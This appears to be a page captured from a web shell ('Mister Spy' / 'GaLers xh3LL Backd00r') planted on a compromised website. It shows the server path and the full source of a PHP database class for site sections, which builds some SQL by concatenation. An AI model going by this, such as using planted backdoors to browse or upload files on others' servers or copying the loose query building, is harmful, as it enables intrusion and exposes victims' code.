Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/public_html/web/library/
Upload File :
Current File : /home/caballoscriollos/public_html/web/library/class.secciones.php

<?php 

require_once('class.dbaccess.php');
require_once('class.seccion.php');
require_once('class.categoria.php');
require_once('class.filter.php');
require_once('class.page.php');

class Secciones extends DBAccess implements IFilterable
{
	public function ParseFilter(array $filter)
	{
		$sql = '';
		
		if ((isset($filter['Nombre'])) && ($filter['Nombre'] != ''))
		{
			$sql.= " AND ( s.Nombre LIKE '%" . DB::StringUnquoted($filter['Nombre']) . "%'";
			$sql.= " OR s.Nombre IS NULL)";
		}
		
		if ((isset($filter['IdCategoria'])) && ($filter['IdCategoria'] != ''))
			$sql.= " AND s.IdCategoria = " . DB::Number($filter['IdCategoria']);
		
		return $sql;
	}


	public function GetAll(array $filter = NULL, Page $oPage = NULL)
	{
		$sql = "SELECT s.*";
		$sql.= " FROM tblSecciones s";
		$sql.= " INNER JOIN tblCategorias c ON s.IdCategoria = c.IdCategoria";
		$sql.= " WHERE 1";
		$sql.= ($filter) ? $this->ParseFilter($filter) : "";
		$sql.= " ORDER BY c.Nombre, s.Orden, s.Nombre ASC";
		$sql.= ($oPage) ? Pageable::ParsePage($oPage) : "";

		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		$arr = array();
		
		while ($oRow = $oRes->GetRow())	
		{	
			$oSeccion = new Seccion();
			$oSeccion->ParseFromArray($oRow);
			
			array_push($arr, $oSeccion);
			
			$oRes->MoveNext();
		}	
		
		return $arr;
	}


	public function GetAllBusqueda(array $filter = NULL, Page $oPage = NULL)
	{
		$sql = "SELECT s.*";
		$sql.= " FROM tblSecciones s";
		$sql.= " INNER JOIN tblCategorias c ON s.IdCategoria = c.IdCategoria";
		$sql.= ($filter) ? $this->ParseFilter($filter) : "";
		$sql.= " ORDER BY c.Nombre, s.Orden, s.Nombre ASC";
		$sql.= ($oPage) ? Pageable::ParsePage($oPage) : "";

		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		$arr = array();
		
		array_push($arr, new Seccion());	
		
		while ($oRow = $oRes->GetRow())	
		{	
			$oSeccion = new Seccion();
			$oSeccion->ParseFromArray($oRow);
			$oSeccion->Nombre = utf8_encode($oSeccion->Nombre);
			
			array_push($arr, $oSeccion);
			
			$oRes->MoveNext();
		}	
		
		return $arr;		
	}
	

	public function GetAllByCategoria(Categoria $oCategoria)
	{
		$arr = array();
	
		$sql = "SELECT s.*";
		$sql.= " FROM tblSecciones s";
		$sql.= " WHERE s.IdCategoria = " . DB::Number($oCategoria->IdCategoria);
		$sql.= " ORDER BY IdCategoria, s.Nombre ASC";
		
		if ( !($oRes = $this->GetQuery($sql)) )
			return false;
					
		while ($oRow = $oRes->GetRow())	
		{	
			$oSeccion = new Seccion();
			$oSeccion->ParseFromArray($oRow);
			
			array_push($arr, $oSeccion);
			
			$oRes->MoveNext();
		}	

		return $arr;
	}
	
	public function GetById($IdSeccion)
	{
		$sql = "SELECT s.*";
		$sql.= " FROM tblSecciones s";
		$sql.= " WHERE IdSeccion = " . DB::Number($IdSeccion);	
			
		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		if (!($oRow = $oRes->GetRow()))
			return false;
		
		$oSeccion = new Seccion();
		$oSeccion->ParseFromArray($oRow);
		
		return $oSeccion;		
	}
	
	
	public function GetByNombre($Nombre)
	{
		$sql = "SELECT s.*";
		$sql.= " FROM tblSecciones s";
		$sql.= " WHERE s.Nombre RLIKE " . DB::String($Nombre);	

		if (!($oRes = $this->GetQuery($sql)))
			return false;
			
		if (!($oRow = $oRes->GetRow()))
			return false;
		
		$oSeccion = new Seccion();
		$oSeccion->ParseFromArray($oRow);
		
		return $oSeccion;		
	}
	
	
	public function GetCountRows(array $filter = NULL)
	{
		$sql = "SELECT s.*";
		$sql.= " FROM tblSecciones s";
		$sql.= " WHERE 1";
		$sql.= ($filter) ? $this->ParseFilter($filter) : "";
		
		if (!($oRes = $this->GetQuery($sql)))
			return false;
		
		$CountRows = $oRes->NumRows();
		
		return $CountRows;
	}
	
	
	public function Create(Seccion $oSeccion)
	{
		$arr = array
		(
			'IdCategoria' 	=> DB::Number($oSeccion->IdCategoria),
			'Nombre' 		=> DB::String($oSeccion->Nombre),
			'Orden' 		=> DB::Number($oSeccion->Orden)
		);
		
		if (!$this->Insert('tblSecciones', $arr))
			return false;
			
		$oSeccion->IdSeccion = DBAccess::GetLastInsertId();
			
		return $oSeccion;
	}
	
	
	public function Update(Seccion $oSeccion)
	{
		$where = " IdSeccion = " . DB::Number($oSeccion->IdSeccion);
		
		$arr = array
		(
			'IdCategoria'	=> DB::Number($oSeccion->IdCategoria),
			'Nombre' 		=> DB::String($oSeccion->Nombre),
			'Orden' 		=> DB::Number($oSeccion->Orden)
		);
		
		if (!DBAccess::UpdateEntidad('tblSecciones', $arr, $where))
			return false;
		
		return $oSeccion;
	}
	

	public function Delete($IdSeccion)
	{
		if (!DBAccess::$db->Begin())
			return false;
			
		$where = " IdSeccion = " . DB::Number($IdSeccion);

		if (!DBAccess::DeleteEntidad('tblSecciones', $where))
		{
			DBAccess::$db->Rollback();	
			return false;
		}

		DBAccess::$db->Commit();
		
		return true;	
	}		
}

?>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat